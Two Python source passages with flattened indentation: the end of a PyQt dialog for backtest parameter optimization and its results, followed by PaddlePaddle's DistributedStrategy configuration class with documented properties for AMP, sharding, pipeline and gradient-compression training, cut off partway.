start_edit = QtWidgets.QLineEdit(str(value))
step_edit = QtWidgets.QLineEdit(str(1))
end_edit = QtWidgets.QLineEdit(str(value))
for edit in [start_edit, step_edit, end_edit]:
edit.setValidator(validator)
grid.addWidget(QLabel(name), row, 0)
grid.addWidget(start_edit, row, 1)
grid.addWidget(step_edit, row, 2)
grid.addWidget(end_edit, row, 3)
self.edits[name] = {
"type": type_,
"start": start_edit,
"step": step_edit,
"end": end_edit
}
row += 1
parallel_button = QtWidgets.QPushButton("多进程优化")
parallel_button.clicked.connect(self.generate_parallel_setting)
grid.addWidget(parallel_button, row, 0, 1, 4)
row += 1
ga_button = QtWidgets.QPushButton("遗传算法优化")
ga_button.clicked.connect(self.generate_ga_setting)
grid.addWidget(ga_button, row, 0, 1, 4)
self.setLayout(grid)
def generate_ga_setting(self):
""""""
self.use_ga = True
self.generate_setting()
def generate_parallel_setting(self):
""""""
self.use_ga = False
self.generate_setting()
def generate_setting(self):
""""""
self.optimization_setting = OptimizationSetting()
self.target_display = self.target_combo.currentText()
target_name = self.DISPLAY_NAME_MAP[self.target_display]
self.optimization_setting.set_target(target_name)
for name, d in self.edits.items():
type_ = d["type"]
start_value = type_(d["start"].text())
step_value = type_(d["step"].text())
end_value = type_(d["end"].text())
if start_value == end_value:
self.optimization_setting.add_parameter(name, start_value)
else:
self.optimization_setting.add_parameter(
name,
start_value,
end_value,
step_value
)
self.accept()
def get_setting(self):
""""""
return self.optimization_setting, self.use_ga
class OptimizationResultMonitor(QtWidgets.QDialog):
"""
For viewing optimization result.
"""
def __init__(
self, result_values: list, target_display: str
):
""""""
super().__init__()
self.result_values = result_values
self.target_display = target_display
self.init_ui()
def init_ui(self):
""""""
self.setWindowTitle("参数优化结果")
self.resize(1100, 500)
table = QtWidgets.QTableWidget()
table.setColumnCount(2)
table.setRowCount(len(self.result_values))
table.setHorizontalHeaderLabels(["参数", self.target_display])
table.setEditTriggers(table.NoEditTriggers)
table.verticalHeader().setVisible(False)
table.horizontalHeader().setSectionResizeMode(
0, QtWidgets.QHeaderView.ResizeToContents
)
table.horizontalHeader().setSectionResizeMode(
1, QtWidgets.QHeaderView.Stretch
)
for n, tp in enumerate(self.result_values):
setting, target_value, _ = tp
setting_cell = QtWidgets.QTableWidgetItem(str(setting))
target_cell = QtWidgets.QTableWidgetItem(str(target_value))
setting_cell.setTextAlignment(QtCore.Qt.AlignCenter)
target_cell.setTextAlignment(QtCore.Qt.AlignCenter)
table.setItem(n, 0, setting_cell)
table.setItem(n, 1, target_cell)
vbox = QtWidgets.QVBoxLayout()
vbox.addWidget(table)
self.setLayout(vbox)
|
the-stack_106_19044
|
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import paddle
from paddle.distributed.fleet.proto import distributed_strategy_pb2
from paddle.fluid.framework import Variable, set_flags, core
from paddle.fluid.wrapped_decorator import wrap_decorator
import google.protobuf.text_format
import google.protobuf
__all__ = ["DistributedStrategy"]
non_auto_func_called = True
def __non_auto_func_called__(func):
def __impl__(*args, **kwargs):
global non_auto_func_called
non_auto_func_called = False
return func(*args, **kwargs)
return __impl__
is_strict_auto = wrap_decorator(__non_auto_func_called__)
def get_msg_dict(msg):
res_dict = {}
fields = msg.DESCRIPTOR.fields
for f in fields:
res_dict[f.name] = getattr(msg, f.name)
return res_dict
def assign_configs_value(msg, config):
fields = msg.DESCRIPTOR.fields
for key in config:
for f in fields:
if key == f.name:
# LABEL_OPTIONAL = 1
# LABEL_REPEATED = 3
# LABEL_REQUIRED = 2
if f.label == 3:
getattr(msg, f.name).extend(config[f.name])
elif f.label == 1 or f.label == 2:
setattr(msg, f.name, config[f.name])
def check_configs_key(msg, config, field_name):
key_list = msg.DESCRIPTOR.fields_by_name.keys()
for key in config:
assert key in key_list, "key:{} not in {}".format(key, field_name)
class DistributedJobInfo(object):
"""
DistributedJobInfo will serialize all distributed training information
Just for inner use: 1) debug 2) replicate experiments
"""
def __init__(self):
self.job_info = distributed_strategy_pb2.DistributedJobInfo()
def _set_worker_num(self, worker_num):
self.job_info.worker_num = worker_num
def _set_server_num(self, server_num):
self.job_info.server_num = server_num
def _set_worker_ips(self, worker_ips):
self.job_info.worker_ips.extend(worker_ips)
def _set_server_endpoints(self, server_endpoints):
self.job_info.server_endpoints.extend(server_endpoints)
def _set_origin_startup(self, origin_startup_prog):
self.job_info.origin_startup = str(origin_startup_prog)
def _set_origin_main(self, origin_main_prog):
self.job_info.origin_main = str(origin_main_prog)
def _distributed_main(self, distributed_main_prog):
self.job_info.distributed_main = str(distributed_main_prog)
def _optimizer_name(self, optimizer_name):
self.job_info.optimizer_name = optimizer_name
def _set_distributed_strategy(self, dist_strategy):
self.job_info.strategy = dist_strategy
class DistributedStrategy(object):
__lock_attr = False
def __init__(self):
"""
DistributedStrategy is the main configuration entry for distributed training of Paddle.
All of the distributed training configurations can be configured in DistributedStrategy,
such as automatic mixed precision (AMP), Layer-wise Adaptive Rate Scaling (LARS),
asynchronous update parameter server(ASGD), etc.
DistributedStrategy can be serialized into protobuf file or deserialized from protobuf file
Users who run local training usually configure BuildStrategy and ExecutionStrategy, and
DistributedStrategy supports configurations from BuildStrategy and ExecutionStrategy
"""
self.strategy = distributed_strategy_pb2.DistributedStrategy()
# Set the default values of the following flags to the ones set by users
key = 'FLAGS_cudnn_batchnorm_spatial_persistent'
if core.globals().is_public(key):
self.strategy.cudnn_batchnorm_spatial_persistent = bool(
core.globals()[key])
key = 'FLAGS_conv_workspace_size_limit'
if core.globals().is_public(key):
self.strategy.conv_workspace_size_limit = int(core.globals()[key])
key = 'FLAGS_cudnn_exhaustive_search'
if core.globals().is_public(key):
self.strategy.cudnn_exhaustive_search = bool(core.globals()[key])
key = 'FLAGS_sync_nccl_allreduce'
if core.globals().is_public(key):
self.strategy.sync_nccl_allreduce = bool(core.globals()[key])
self.__lock_attr = True
def __setattr__(self, key, value):
if self.__lock_attr and not hasattr(self, key):
raise TypeError("%s is not a attribute of %s" %
(key, self.__class__.__name__))
object.__setattr__(self, key, value)
def save_to_prototxt(self, output):
"""
Serialize current DistributedStrategy to string and save to output file
Examples:
.. code-block:: python
import paddle.distributed.fleet as fleet
strategy = fleet.DistributedStrategy()
strategy.dgc = True
strategy.recompute = True
strategy.recompute_configs = {"checkpoints": ["x"]}
strategy.save_to_prototxt("dist_strategy.prototxt")
"""
with open(output, "w") as fout:
fout.write(str(self.strategy))
def load_from_prototxt(self, pb_file):
"""
Load from prototxt file for DistributedStrategy initialization
Examples:
.. code-block:: python
import paddle.distributed.fleet as fleet
strategy = fleet.DistributedStrategy()
strategy.load_from_prototxt("dist_strategy.prototxt")
"""
with open(pb_file, 'r') as f:
self.strategy = google.protobuf.text_format.Merge(
str(f.read()), self.strategy)
@property
def execution_strategy(self):
"""
Configure ExecutionStrategy for DistributedStrategy
Examples:
.. code-block:: python
import paddle
exe_strategy = paddle.static.ExecutionStrategy()
exe_strategy.num_threads = 10
exe_strategy.num_iteration_per_drop_scope = 10
exe_strategy.num_iteration_per_run = 10
strategy = paddle.distributed.fleet.DistributedStrategy()
strategy.execution_strategy = exe_strategy
"""
execution_strategy = paddle.fluid.ExecutionStrategy()
fields = self.strategy.execution_strategy.DESCRIPTOR.fields
for f in fields:
setattr(execution_strategy, f.name,
getattr(self.strategy.execution_strategy, f.name))
return execution_strategy
@execution_strategy.setter
@is_strict_auto
def execution_strategy(self, strategy):
fields = self.strategy.execution_strategy.DESCRIPTOR.fields
for f in fields:
setattr(self.strategy.execution_strategy, f.name,
getattr(strategy, f.name))
@property
def build_strategy(self):
"""
Configure BuildStrategy for DistributedStrategy
Note that the properties of BuildStrategy are valid in DistributedStrategy
only if the property is non-distributed strategy.
Examples:
.. code-block:: python
import paddle
build_strategy = paddle.static.BuildStrategy()
build_strategy.enable_sequential_execution = True
build_strategy.fuse_elewise_add_act_ops = True
build_strategy.fuse_bn_act_ops = True
build_strategy.enable_auto_fusion = True
build_strategy.fuse_relu_depthwise_conv = True
build_strategy.fuse_broadcast_ops = True
build_strategy.fuse_all_optimizer_ops = True
build_strategy.enable_inplace = True
strategy = paddle.distributed.fleet.DistributedStrategy()
strategy.build_strategy = build_strategy
"""
build_strategy = paddle.fluid.BuildStrategy()
fields = self.strategy.build_strategy.DESCRIPTOR.fields
for f in fields:
setattr(build_strategy, f.name,
getattr(self.strategy.build_strategy, f.name))
return build_strategy
@build_strategy.setter
@is_strict_auto
def build_strategy(self, strategy):
fields = self.strategy.build_strategy.DESCRIPTOR.fields
for f in fields:
if f.label == 1 or f.label == 2: # optional and required field
setattr(self.strategy.build_strategy, f.name,
getattr(strategy, f.name))
elif f.label == 3: # repeated field
getattr(self.strategy.build_strategy,
f.name).extend(getattr(strategy, f.name))
@property
def a_sync(self):
"""
Indicating whether we are using asynchronous stocastic gradient descent updates
for training. This property is valid when we are using parameter server training,
which is implied by setting approperate RoleMaker
Default value: True
Examples:
.. code-block:: python
import paddle.distributed.fleet as fleet
role_maker = fleet.PaddleCloudRoleMaker()
fleet.init(role_maker)
strategy = fleet.DistributedStrategy()
strategy.a_sync = True # by default this is True
# code block for defining loss and local optimizer
# sgd = fleet.distributed_optimizer(optimizer, strategy)
"""
return self.strategy.a_sync
@a_sync.setter
@is_strict_auto
def a_sync(self, flag):
if isinstance(flag, bool):
self.strategy.a_sync = flag
self.a_sync_configs = {"k_steps": 0}
else:
raise ValueError(
"The type of `flag` is invalid, expected type is bool, but received %s".
format(type(flag)))
@property
def a_sync_configs(self):
"""
Set a_sync update configurations. In general, asynchronous parameter server
training has serveral configurable settings that can be configured through
a dict.
**Notes**:
k_step(int): number of local optimization updates before communication
max_merge_var_num(int): maximum number of merged gradients before communication
send_queue_size(int): a buffer size of worker communication
independent_recv_thread(bool): if we are using independent recv thread for communication
thread_pool_size(int): number of thread pool
send_wait_times(int): waiting time for sending gradients
runtime_split_send_recv(bool): if we are using Tensor split for send and recv during runtime
Examples:
.. code-block:: python
import paddle.distributed.fleet as fleet
role_maker = fleet.PaddleCloudRoleMaker()
fleet.init(role_maker)
strategy = fleet.DistributedStrategy()
strategy.a_sync = True # by default this is True
configs = {"k_steps": 1024, "send_queue_size": 32}
strategy.a_sync_configs = configs
# code block for defining loss and local optimizer
# sgd = fleet.distributed_optimizer(optimizer, strategy)
"""
return get_msg_dict(self.strategy.a_sync_configs)
@a_sync_configs.setter
@is_strict_auto
def a_sync_configs(self, configs):
check_configs_key(self.strategy.a_sync_configs, configs,
"a_sync_configs")
assign_configs_value(self.strategy.a_sync_configs, configs)
@property
def amp(self):
"""
Indicating whether we are using automatic mixed precision training
Default Value: False
Examples:
.. code-block:: python
import paddle.distributed.fleet as fleet
strategy = fleet.DistributedStrategy()
strategy.amp = True # by default this is false
"""
return self.strategy.amp
@amp.setter
@is_strict_auto
def amp(self, flag):
if isinstance(flag, bool):
self.strategy.amp = flag
else:
print("WARNING: amp should have value of bool type")
@property
def amp_configs(self):
"""
Set automatic mixed precision training configurations. In general, amp has serveral configurable
settings that can be configured through a dict.
**Notes**:
init_loss_scaling(float): The initial loss scaling factor. Default 32768.
use_dynamic_loss_scaling(bool): Whether to use dynamic loss scaling. Default True.
incr_every_n_steps(int): Increases loss scaling every n consecutive steps with finite gradients. Default 1000.
decr_every_n_nan_or_inf(int): Decreases loss scaling every n accumulated steps with nan or inf gradients. Default 2.
incr_ratio(float): The multiplier to use when increasing the loss scaling. Default 2.0.
decr_ratio(float): The less-than-one-multiplier to use when decreasing the loss scaling. Default 0.5.
custom_white_list(list[str]): Users' custom white list which always execution fp16.
custom_black_list(list[str]): Users' custom black list which forbidden execution fp16.
custom_black_varnames(list[str]): Users' custom black varibles' names.
use_pure_fp16(bool): Whether to use the pure fp16 training. Default False.
use_fp16_guard(bool): Whether to use `fp16_guard` when constructing the program.
Default True. Only takes effect when `use_pure_fp16` is turned on.
Examples 1:
.. code-block:: python
import paddle.distributed.fleet as fleet
strategy = fleet.DistributedStrategy()
strategy.amp = True
strategy.amp_configs = {
"init_loss_scaling": 32768,
"custom_white_list": ['conv2d']}
Examples 2:
.. code-block:: python
import paddle.distributed.fleet as fleet
strategy = fleet.DistributedStrategy()
strategy.amp = True
# pure fp16
strategy.amp_configs = {
"init_loss_scaling": 32768,
"use_pure_fp16": True
}
"""
return get_msg_dict(self.strategy.amp_configs)
@amp_configs.setter
@is_strict_auto
def amp_configs(self, configs):
check_configs_key(self.strategy.amp_configs, configs, "amp_configs")
assign_configs_value(self.strategy.amp_configs, configs)
@property
def recompute(self):
"""
Indicating whether we are using forward recomputation for memory optimization
Default value: False
Examples:
.. code-block:: python
import paddle.distributed.fleet as fleet
strategy = fleet.DistributedStrategy()
strategy.recompute = True
# suppose x and y are names of checkpoint tensors for recomputation
strategy.recompute_configs = {"checkpoints": ["x", "y"]}
"""
return self.strategy.recompute
@property
def sync_nccl_allreduce(self):
"""
Indicating whether we are using synchronized all reduce in each communication thread
We note that system overhead is usually lower when sync_nccl_allreduce = True
Examples:
.. code-block:: python
import paddle.distributed.fleet as fleet
strategy = fleet.DistributedStrategy()
strategy.sync_nccl_allreduce = True
"""
return self.strategy.sync_nccl_allreduce
@sync_nccl_allreduce.setter
@is_strict_auto
def sync_nccl_allreduce(self, flag):
if isinstance(flag, bool):
self.strategy.sync_nccl_allreduce = flag
else:
print("WARNING: sync_nccl_allreduce should have value of bool type")
@property
def use_hierarchical_allreduce(self):
"""
Indicating whether we are using hierarchical allreduce in collective communication
Hierarchical allreduce often does allreduce within a certain node group and then do
allreduce among the leaders of each group
Examples:
.. code-block:: python
import paddle.distributed.fleet as fleet
strategy = fleet.DistributedStrategy()
strategy.use_hierarchical_allreduce = True
"""
return self.strategy.use_hierarchical_allreduce
@use_hierarchical_allreduce.setter
@is_strict_auto
def use_hierarchical_allreduce(self, flag):
if isinstance(flag, bool):
self.strategy.use_hierarchical_allreduce = flag
else:
print(
"WARNING: use_hierarchical_allreduce should have value of bool type"
)
@property
def hierarchical_allreduce_inter_nranks(self):
"""
Number of ranks for low level node groups in hierarchical allreduce
Default value: number of GPU cards on each single GPU machine
Example:
.. code-block:: python
import paddle.distributed.fleet as fleet
strategy = fleet.DistributedStrategy()
strategy.hierarchical_allreduce_inter_nranks = 8
"""
return self.strategy.hierarchical_allreduce_inter_nranks
@hierarchical_allreduce_inter_nranks.setter
@is_strict_auto
def hierarchical_allreduce_inter_nranks(self, value):
if isinstance(value, int):
self.strategy.hierarchical_allreduce_inter_nranks = value
else:
print(
"WARNING: hierarchical_allreduce_inter_nranks should have value of int type"
)
@property
def sync_batch_norm(self):
"""
Indicating whether we are using sync_batch_norm to do synchronous batch normalization among all training nodes.
Default value: False
Examples:
.. code-block:: python
import paddle.distributed.fleet as fleet
strategy = fleet.DistributedStrategy()
strategy.sync_batch_norm = True
"""
return self.strategy.sync_batch_norm
@sync_batch_norm.setter
@is_strict_auto
def sync_batch_norm(self, flag):
if isinstance(flag, bool):
self.strategy.sync_batch_norm = flag
else:
print("WARNING: sync_batch_norm should have value of bool type")
@property
def fuse_all_reduce_ops(self):
"""
Indicating whether we are using fuse_all_reduce_ops for gradient fusion during backward phase of training
Default value: True
Examples:
.. code-block:: python
import paddle.distributed.fleet as fleet
strategy = fleet.DistributedStrategy()
strategy.fuse_all_reduce_ops = False
"""
return self.strategy.fuse_all_reduce_ops
@fuse_all_reduce_ops.setter
@is_strict_auto
def fuse_all_reduce_ops(self, flag):
if isinstance(flag, bool):
self.strategy.fuse_all_reduce_ops = flag
else:
print("WARNING: fuse_all_reduce_ops should have value of bool type")
@property
def fuse_grad_size_in_MB(self):
"""
Specifying the size of gradient to fuse in Mega-Bytes
Default value: 32
Examples:
.. code-block:: python
import paddle.distributed.fleet as fleet
strategy = fleet.DistributedStrategy()
strategy.fuse_grad_size_in_MB = 50
"""
return self.strategy.fuse_grad_size_in_MB
@fuse_grad_size_in_MB.setter
@is_strict_auto
def fuse_grad_size_in_MB(self, value):
if isinstance(value, int):
self.strategy.fuse_grad_size_in_MB = value
else:
print("WARNING: fuse_grad_size_in_MB should have value of int type")
@property
def last_comm_group_size_MB(self):
"""
Specifying the size of gradient to fuse in Mega-Bytes when
the last group of each batch communicates. Making the last group
small is useful to improve performance.
Default value: 1
Examples:
.. code-block:: python
import paddle.distributed.fleet as fleet
strategy = fleet.DistributedStrategy()
strategy.last_comm_group_size_MB = 2
"""
return self.strategy.last_comm_group_size_MB
@last_comm_group_size_MB.setter
@is_strict_auto
def last_comm_group_size_MB(self, value):
if value > 0:
self.strategy.last_comm_group_size_MB = value
else:
raise ValueError("last_comm_group_size_MB should be greater than 0")
@property
def find_unused_parameters(self):
"""
Indicating whether we are using find_unused_parameters to
find unused parameters in DataParallel.
Default value: True
Examples:
.. code-block:: python
import paddle.distributed.fleet as fleet
strategy = fleet.DistributedStrategy()
strategy.find_unused_parameters = True
"""
return self.strategy.find_unused_parameters
@find_unused_parameters.setter
@is_strict_auto
def find_unused_parameters(self, flag):
if isinstance(flag, bool):
self.strategy.find_unused_parameters = flag
else:
print(
"WARNING: find_unused_parameters should have value of bool type")
@property
def _fuse_grad_size_in_TFLOPS(self):
return self.strategy.fuse_grad_size_in_TFLOPS
@_fuse_grad_size_in_TFLOPS.setter
@is_strict_auto
def _fuse_grad_size_in_TFLOPS(self, value):
if isinstance(value, float):
self.strategy.fuse_grad_size_in_TFLOPS = value
else:
print(
"WARNING: fuse_grad_size_in_TFLOPS should have value of float type"
)
@property
def nccl_comm_num(self):
"""
Specifying the number of NCCL communicator
Default value: 1
Examples:
.. code-block:: python
import paddle.distributed.fleet as fleet
strategy = fleet.DistributedStrategy()
strategy.nccl_comm_num = 2
"""
return self.strategy.nccl_comm_num
@nccl_comm_num.setter
@is_strict_auto
def nccl_comm_num(self, value):
if isinstance(value, int):
self.strategy.nccl_comm_num = value
else:
print("WARNING: nccl_comm_num should have value of int type")
@recompute.setter
@is_strict_auto
def recompute(self, flag):
if isinstance(flag, bool):
self.strategy.recompute = flag
else:
print("WARNING: recompute should have value of bool type")
@property
def recompute_configs(self):
"""
Set recompute configurations.
**Note**:
checkpoints(list): list of string name of checkpoints. In general, the recompute
strategy of current implementation should have some manually assign checkpoints.
enable_offload(bool): enable recompute checkpoints offload feature. this feature
will offload the checkpoint to host memory to allow even larger batch size. since
the memcpy from host to device takes time, it is a trade off between larger batch
size and training speed.
checkpoint_shape(list): list of int that specific the shape of checkpoint. so far
recompute-offload requires that all checkpoint to be same shape, and every dimension
specific here should be determined ("-1" is not allowed).
Examples:
.. code-block:: python
import paddle.distributed.fleet as fleet
strategy = fleet.DistributedStrategy()
strategy.recompute = True
strategy.recompute_configs = {
"checkpoints": ["x", "y"],
"enable_offload": True,
"checkpoint_shape": [100, 512, 1024] }
"""
return get_msg_dict(self.strategy.recompute_configs)
@recompute_configs.setter
@is_strict_auto
def recompute_configs(self, configs):
check_configs_key(self.strategy.recompute_configs, configs,
"checkpoint_configs")
assign_configs_value(self.strategy.recompute_configs, configs)
@property
def sharding(self):
"""
Indicating whether we are using sharding Optimizer for memory
optimization. We implement the sharding optimizer following the ZeRO-DP
idea from [ZeRO: Memory Optimizations Toward Training Trillion Parameter Models](https://arxiv.org/abs/1910.02054).
Model parameters and Optimizer State are sharded into different ranks allowing to fit larger model.
Default value: False
Examples:
.. code-block:: python
import paddle.fleet as fleet
strategy = fleet.DistributedStrategy()
strategy.sharding = True
"""
return self.strategy.sharding
@sharding.setter
@is_strict_auto
def sharding(self, flag):
if isinstance(flag, bool):
self.strategy.sharding = flag
else:
print("WARNING: sharding should have value of bool type")
@property
def sharding_configs(self):
"""
Set sharding configurations.
**Note**:
fuse_broadcast_MB(float): size of a fused group of broadcasted parameters.
This configuration will affect the communication speed in sharding training,
and should be an empirical value decided by your model size and network topology.
hybrid_dp(bool): enable hybrid data parallelism above the sharding parallelism.
you are supposed to have at least double the number of gpu you have in normal sharding
training to enable this feature.
sharding_group_size(int): attribute of hybrid_dp. specific the the number of gpus within
each sharding group; and therefore, the number of hybrid data parallelism ways will be equal
to (global_size / sharding_group_size).
Examples:
.. code-block:: python
import paddle.distributed.fleet as fleet
strategy = fleet.DistributedStrategy()
strategy.sharding = True
strategy.sharding_configs = {
"fuse_broadcast_MB": 32,
"hybrid_dp": True,
"sharding_group_size": 8}
"""
return get_msg_dict(self.strategy.sharding_configs)
@sharding_configs.setter
@is_strict_auto
def sharding_configs(self, configs):
check_configs_key(self.strategy.sharding_configs, configs,
"sharding_configs")
assign_configs_value(self.strategy.sharding_configs, configs)
@property
def pipeline(self):
"""
Indicating whether we are using pipeline parallelism for distributed training.
Current implementation mainly focus on single GPU machine pipeline parallelism and
data parallelism across GPU machine. The pipeline information is indicated through
device_guard information in user-defined program.
Examples:
.. code-block:: python
import paddle.distributed.fleet as fleet
strategy = fleet.DistributedStrategy()
strategy.pipeline = True
"""
return self.strategy.pipeline
@pipeline.setter
@is_strict_auto
def pipeline(self, flag):
if isinstance(flag, bool):
self.strategy.pipeline = flag
else:
print("WARNING: pipeline should have value of bool type")
@property
def pipeline_configs(self):
"""
Set pipeline parallelism configurations. In pipeline parallelism,
different parts of neural networks are running on different GPUS.
There are Tensor queue buffer between each pair of neighborhood GPUS
that are responsible for synchronizing hidden Tensor results between
GPUs. Pipeline parallelism consists of serveral producer-consumer style
hardware pairs, such as GPU-GPU, CPU-GPU, GPU-XPU. The best way to speedup
pipeline parallelism is to make the size of Tensor in Tensor queue smaller,
so that we will have a faster producer for downstream consumers.
**Notes**:
**Detailed arguments for pipeline_configs**
**micro_batch**: the number of small batches in each user defined batch
Examples:
.. code-block:: python
import paddle.distributed.fleet as fleet
strategy = fleet.DistributedStrategy()
strategy.pipeline = True
strategy.pipeline_configs = {"micro_batch": 12}
"""
return get_msg_dict(self.strategy.pipeline_configs)
@pipeline_configs.setter
@is_strict_auto
def pipeline_configs(self, configs):
check_configs_key(self.strategy.pipeline_configs, configs,
"pipeline_configs")
assign_configs_value(self.strategy.pipeline_configs, configs)
@property
def hybrid_configs(self):
"""
Dynamic graph hybrid parallel strategy configuration. Three-way hybrid parallelism
needs to meet the following relationships
total_number_GPUs = dp_degree * mp_degree * pp_degree
**Note**:
dp_degree(int): set number of GPUs in a data parallel group. Default -1.
This value should be an integer greater than 0.
If it is not set, or set to -1, its value will be inferred
based on the total number of cards.
mp_degree(int): set number of GPUs in a model parallel group. Default 1
pp_degree(int): set number of GPUs in a pipeline parallel group. Default 1
Examples:
.. code-block:: python
import paddle.distributed.fleet as fleet
strategy = fleet.DistributedStrategy()
strategy.hybrid_configs = {
"dp_degree": 1,
"mp_degree": 2,
"pp_degree": 1}
"""
return get_msg_dict(self.strategy.hybrid_configs)
@hybrid_configs.setter
def hybrid_configs(self, configs):
check_configs_key(self.strategy.hybrid_configs, configs,
"hybrid_configs")
assign_configs_value(self.strategy.hybrid_configs, configs)
@property
def localsgd(self):
"""
Indicating whether we are using Local SGD training. Default Value: False
For more details, please refer to
`Don't Use Large Mini-Batches, Use Local SGD <https://arxiv.org/pdf/1808.07217.pdf>`_.
Examples:
.. code-block:: python
import paddle.distributed.fleet as fleet
strategy = fleet.DistributedStrategy()
strategy.localsgd = True # by default this is false
"""
return self.strategy.localsgd
@localsgd.setter
@is_strict_auto
def localsgd(self, flag):
if isinstance(flag, bool):
self.strategy.localsgd = flag
else:
print("WARNING: localsgd should have value of bool type")
@property
def localsgd_configs(self):
"""
Set LocalSGD training configurations. LocalSGD has a configurable
setting that can be configured through a dict.
**Notes**:
k_steps(int) The local steps for training before parameter synchronization. Default 1.
begin_step(int) The step of begining training by localsgd. Default 1.
Examples:
.. code-block:: python
import paddle.distributed.fleet as fleet
strategy = fleet.DistributedStrategy()
strategy.localsgd = True
strategy.localsgd_configs = {"k_steps": 4,
"begin_step": 30}
"""
return get_msg_dict(self.strategy.localsgd_configs)
@localsgd_configs.setter
@is_strict_auto
def localsgd_configs(self, configs):
check_configs_key(self.strategy.localsgd_configs, configs,
"localsgd_configs")
assign_configs_value(self.strategy.localsgd_configs, configs)
@property
def adaptive_localsgd(self):
"""
Indicating whether we are using Adaptive Local SGD training. Default Value: False
For more details, please refer to `Adaptive Communication Strategies to Achieve
the Best Error-Runtime Trade-off in Local-Update SGD <https://arxiv.org/pdf/1810.08313.pdf>`_.
Examples:
.. code-block:: python
import paddle.distributed.fleet as fleet
strategy = fleet.DistributedStrategy()
strategy.adaptive_localsgd = True # by default this is false
"""
return self.strategy.adaptive_localsgd
@adaptive_localsgd.setter
@is_strict_auto
def adaptive_localsgd(self, flag):
if isinstance(flag, bool):
self.strategy.adaptive_localsgd = flag
else:
print("WARNING: adaptive_localsgd should have value of bool type")
@property
def adaptive_localsgd_configs(self):
"""
Set AdaptiveLocalSGD training configurations. AdaptiveLocalSGD has a configurable
setting that can be configured through a dict.
**Notes**:
init_k_steps(int) The initial steps for training before adaptive localsgd.
Then, the adaptive localsgd method will modify init_k_steps automatically.
Default 1.
begin_step(int) The step of begining training by adaptive localsgd. Default 1.
Examples:
.. code-block:: python
import paddle.distributed.fleet as fleet
strategy = fleet.DistributedStrategy()
strategy.adaptive_localsgd = True
strategy.adaptive_localsgd_configs = {"init_k_steps": 1,
"begin_step": 30}
"""
return get_msg_dict(self.strategy.adaptive_localsgd_configs)
@adaptive_localsgd_configs.setter
@is_strict_auto
def adaptive_localsgd_configs(self, configs):
check_configs_key(self.strategy.adaptive_localsgd_configs, configs,
"adaptive_localsgd_configs")
assign_configs_value(self.strategy.adaptive_localsgd_configs, configs)
@property
def dgc(self):
"""
Indicating whether we are using Deep Gradient Compression training. For more details, please refer to
[Deep Gradient Compression](https://arxiv.org/abs/1712.01887).
Default Value: False
Examples:
.. code-block:: python
import paddle.distributed.fleet as fleet
strategy = fleet.DistributedStrategy()
strategy.dgc = True # by default this is false
"""
return self.strategy.dgc
@dgc.setter
@is_strict_auto
def dgc(self, flag):
if isinstance(flag, bool):
self.strategy.dgc = flag
else:
print("WARNING: dgc should have value of bool type")
@property
def dgc_configs(self):
r"""
Set Deep Gradient Compression training configurations. In general, dgc has serveral configurable
settings that can be configured through a dict.
**Notes**:
rampup_begin_step(int): The beginning step from which gradient compression is implemented. Default 0.
rampup_step(int): Time steps used in sparsity warm-up periods. Default is 1. \
For example, if the sparsity is [0.75, 0.9375, 0.984375, 0.996, 0.999], and the rampup_step is 100, \
it will use 0.75 at 0~19 steps, and 0.9375 at 20~39 steps, and so on. And when reach sparsity array \
ends, it will use 0.999 then and after.
sparsity(list[float]): Get top important element from gradient tensor, the ratio is (1 - sparsity). \
Default is [0.999]. For example, if the sparsity is [0.99, 0.999], the top [1%, 0.1%] important \
element will be transmitted.
Examples:
.. code-block:: python
import paddle.distributed.fleet as fleet
strategy = fleet.DistributedStrategy()
strategy.dgc = True
strategy.dgc_configs = {"rampup_begin_step": 1252}
"""
return get_msg_dict(self.strategy.dgc_configs)
@dgc_configs.setter
@is_strict_auto
def dgc_configs(self, configs):
check_configs_key(self.strategy.dgc_configs, configs, "dgc_configs")
assign_configs_value(self.strategy.dgc_configs, configs)
@property
def fp16_allreduce(self):
"""
Indicating whether we are using fp16 gradient allreduce training
Default Value: False
Examples:
.. code-block:: python
import paddle.distributed.fleet as fleet
strategy = fleet.DistributedStrategy()
strategy.fp16_allreduce = True # by default this is false
"""
return self.strategy.fp16_allreduce
@fp16_allreduce.setter
@is_strict_auto
def fp16_allreduce(self, flag):
if not isinstance(flag, bool):
raise TypeError('fp16_allreduce must be value of bool type')
self.strategy.fp16_allreduce = flag
@property
def gradient_merge(self):
"""
Gradient Merge, also called as Gradient Accumulation,
is a strategy for large batch training. With this strategy,
model parameter will not be updated until user-defined steps.
For each step, the forward network and the backward network
will run to calculate the gradient of model parameters.
For every k step, the optimization network will run,
applying a specific optimization method (such as SGD, Adam)
to model parameters.
Examples:
.. code-block:: python
import paddle.distributed.fleet as fleet
strategy = fleet.DistributedStrategy()
strategy.gradient_merge = True
strategy.gradient_merge_configs = {"k_steps": 4, "avg": True}
"""
return self.strategy.gradient_merge
@gradient_merge.setter
@is_strict_auto
def gradient_merge(self, flag):
if isinstance(flag, bool):
self.strategy.gradient_merge = flag
else:
print("WARNING: gradient_merge should have value of bool type")
@property
def gradient_merge_configs(self):
"""
the key-value configs of distribute_strategy
**Note**:
k_steps(int): the update period of the parameters.
avg(bool): whether to average the gradients of each mini-batch, the default value is `True`
Examples:
.. code-block:: python
import paddle.distributed.fleet as fleet
strategy = fleet.DistributedStrategy()
strategy.gradient_merge = True
strategy.gradient_merge_configs = {"k_steps": 4, "avg": True}
"""
return get_msg_dict(self.strategy.gradient_merge_configs)
@gradient_merge_configs.setter
@is_strict_auto
def gradient_merge_configs(self, configs):
check_configs_key(self.strategy.gradient_merge_configs, configs,
"gradient_configs")
assign_configs_value(self.strategy.gradient_merge_configs, configs)
@property
def lars(self):
"""
Set lars configurations. lars is used to deal with the convergence problems when the global
batch size is larger than 8k. For more details, please refer to
[Large Batch Training of Convolutional Networks](https://arxiv.org/abs/1708.03888).
Default Value: False
Examples:
.. code-block:: python
import paddle.distributed.fleet as fleet
strategy = fleet.DistributedStrategy()
strategy.lars = True # by default this is false
"""
return self.strategy.lars
@lars.setter
@is_strict_auto
def lars(self, flag):
if isinstance(flag, bool):
self.strategy.lars = flag
else:
print("WARNING: lars should have value of bool type")
@property
